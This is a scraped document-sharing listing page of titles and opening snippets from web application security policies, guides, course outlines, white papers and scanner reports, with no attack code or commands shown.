Information Technology Policy Information Technology Policy Enterprise Web Application Firewall ITP Number ITP-SEC004 Category Recommended Policy Contact RA-ITCentral@pa.gov Effective Date January 15, 2010 Supersedes Scheduled Review

More information

Data Breaches and Web Servers: The Giant Sucking Sound

Data Breaches and Web Servers: The Giant Sucking Sound Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

Web Application Security Considerations

Web Application Security Considerations Web Application Security Considerations Eric Peele, Kevin Gainey International Field Directors & Technology Conference 2006 May 21 24, 2006 RTI International is a trade name of Research Triangle Institute

More information

elearning for Secure Application Development

elearning for Secure Application Development elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security

More information

Hardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes

Hardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes 1. HARDENING PHP Hardening Joomla 1.1 Installing Suhosin Suhosin is a PHP Hardening patch which aims to protect the PHP engine and runtime environment from common exploits, such as buffer overflows in

More information

Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers

Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and

More information

Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0

Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0 Special Publication 500-269 Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0 Paul E. Black Elizabeth Fong Vadim Okun Romain Gaucher Software Diagnostics and

More information

Web Application Security. Srikumar Venugopal S2, Week 8, 2013

Web Application Security. Srikumar Venugopal S2, Week 8, 2013 Web Application Security Srikumar Venugopal S2, Week 8, 2013 Before we start Acknowledgements This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc.

More information

Project 2: Web Security Pitfalls

Project 2: Web Security Pitfalls EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course

More information

AAF boost. AAF boost 2014 report for AAF EXAMPLE ORGANISATION

AAF boost. AAF boost 2014 report for AAF EXAMPLE ORGANISATION 2014 AAF boost 2014 report for AAF EXAMPLE ORGANISATION This report focuses on the following 4 key areas to help boost your connection to the federation: Assurance; Awareness of federation tools; Your

More information

With so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up.

With so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up. 1 2 Why do we care about web application security? With so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up. We constantly

More information

The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA

The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4

More information

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6 WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications

More information

Java Web Application Security

Java Web Application Security Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting

More information

Standard: Web Application Development

Standard: Web Application Development Information Security Standards Web Application Development Standard IS-WAD Effective Date TBD Email security@sjsu.edu # Version 2.0 Contact Mike Cook Phone 408-924-1705 Standard: Web Application Development

More information

05.0 Application Development

05.0 Application Development Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development

More information

Application Security Testing. Generic Test Strategy

Application Security Testing. Generic Test Strategy Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication

More information

Web Application Vulnerability Testing with Nessus

Web Application Vulnerability Testing with Nessus The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information

More information

Secure Web Applications. The front line defense

Secure Web Applications. The front line defense Secure Web Applications The front line defense Agenda Web Application Security Threat Overview Exploiting Web Applications Common Attacks & Preventative techniques Developing Secure Web Applications -Security

More information

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.

More information

Web Application Security

Web Application Security Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching

More information

1. Building Testing Environment

1. Building Testing Environment The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,

More information

Web Engineering Web Application Security Issues

Web Engineering Web Application Security Issues Security Issues Dec 14 2009 Katharina Siorpaes Copyright 2009 STI - INNSBRUCK www.sti-innsbruck.at It is NOT Network Security It is securing: Custom Code that drives a web application Libraries Backend

More information

Don t Get Burned! Are you Leaving your Critical Applications Defenseless?

Don t Get Burned! Are you Leaving your Critical Applications Defenseless? Don t Get Burned! Are you Leaving your Critical Applications Defenseless? Ed Bassett Carolyn Ryll, CISSP Enspherics Division of CIBER Presentation Overview Applications Exposed The evolving application

More information

Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)

Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06

More information

Enterprise Application Security Workshop Series

Enterprise Application Security Workshop Series Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants

More information

Application Security Policy

Application Security Policy Purpose This document establishes the corporate policy and standards for ensuring that applications developed or purchased at LandStar Title Agency, Inc meet a minimum acceptable level of security. Policy

More information

Application Denial of Service Is it Really That Easy?

Application Denial of Service Is it Really That Easy? Application Denial of Service Is it Really That Easy? Shay Chen Agenda Introduction to Denial of Service Attacks Application Level DoS Techniques Case Study Denial of Service Testing Mitigation Summary

More information

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis

More information

Technical Findings Sample Report

Technical Findings Sample Report Technical Findings Sample Report A B C C o m p a n y S a m p l e S e c u r i t y A s s e s s m e n t 2 5 0 S c i e n t i f i c D r i v e S u i t e 3 0 0 N o r c r o s s G A 3 0 0 9 2 P h o n e N u m b

More information

Testing Web Applications for SQL Injection Sam Shober SamShober@Hotmail.com

Testing Web Applications for SQL Injection Sam Shober SamShober@Hotmail.com Testing Web Applications for SQL Injection Sam Shober SamShober@Hotmail.com Abstract: This paper discusses the SQL injection vulnerability, its impact on web applications, methods for pre-deployment and

More information

Application Security Testing

Application Security Testing Tstsec - Version: 1 09 July 2016 Application Security Testing Application Security Testing Tstsec - Version: 1 4 days Course Description: We are living in a world of data and communication, in which the

More information

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems Soteria Health Check A Cyber Security Health Check for SAP systems Soteria Cyber Security are staffed by SAP certified consultants. We are CISSP qualified, and members of the UK Cyber Security Forum. Security

More information

REDCap Technical Overview

REDCap Technical Overview REDCap Technical Overview Introduction REDCap is a web application for building and managing online surveys and databases. This document delineates many of the broader technical aspects of REDCap, such

More information

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

Nuclear Regulatory Commission Computer Security Office Computer Security Standard Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:

More information

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications 1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won

More information

Web Vulnerability Detection and Security Mechanism

Web Vulnerability Detection and Security Mechanism Web Vulnerability Detection and Security Mechanism Katkar Anjali S., Kulkarni Raj B. ABSTRACT Web applications consist of several different and interacting technologies. These interactions between different

More information

Sichere Software- Entwicklung für Java Entwickler

Sichere Software- Entwicklung für Java Entwickler Sichere Software- Entwicklung für Java Entwickler Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART

More information

Cloud Security:Threats & Mitgations

Cloud Security:Threats & Mitgations Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer

More information